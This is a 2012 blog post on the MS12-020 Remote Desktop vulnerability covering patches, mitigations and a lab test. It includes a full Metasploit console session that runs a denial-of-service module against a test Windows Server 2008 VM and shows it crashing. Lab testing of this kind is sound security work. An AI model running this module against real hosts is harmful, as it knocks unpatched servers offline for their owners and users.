25 March 2012

[Security] MS12-020 RDP Vulnerability overview and testing


Bài viết liên quan:

By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”

In short the system would crash and have a “blue screen of death” thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that’s not because the choose to be however most places have a “patch cycle” which require extensive testing prior to deployment.
As explained by the fine people over at ISC Diary The Microsoft released patch has several reference KB’s which includes ” KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you’ll see on a Windows system, when installed, depends on the version of the OS you’re running. For Windows 7 you’ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always before applying any patch ensure that you read the release notes.
We recently patched our internet facing servers that had RDP enabled and everything went well with the exception of one server that we were unable to log back into via RDP, we had to gain access to the server via the ILO port then applied a few additional patches then rebooted and that seen to solve the issue.Now for the fun part if you would like to test the proof of concept exploit for this vulnerability grab a copy of Metasploit follow the steps below.
My Test setup:

Linux (SolusOS)
VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 3389 yes The target port

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.2.10:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 – 210 bytes sent
[*] 192.168.2.10:3389 – Checking RDP status…
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed

RHOST = The vulnerable host that is running a vulnerable version of RDP
Screenshot of server 2008 reacting to the exploit

How go on out and patch your systems and if you have some time load Metasploit on a host of your choice and do some testing.

Mitigation:
If you don’t need RDP open to the external world disable it
Change the default port everyone know its 3389
Enable network level authentication (NLA)

http://isc.sans.edu/diary.html?storyid=12808

http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids

http://technet.microsoft.com/en-us/library/cc732713.aspx
Via securegossip ]

0 comments:

Post a Comment

Để lại góp ý của bạn để blog của mình hoàn thiện hơn :))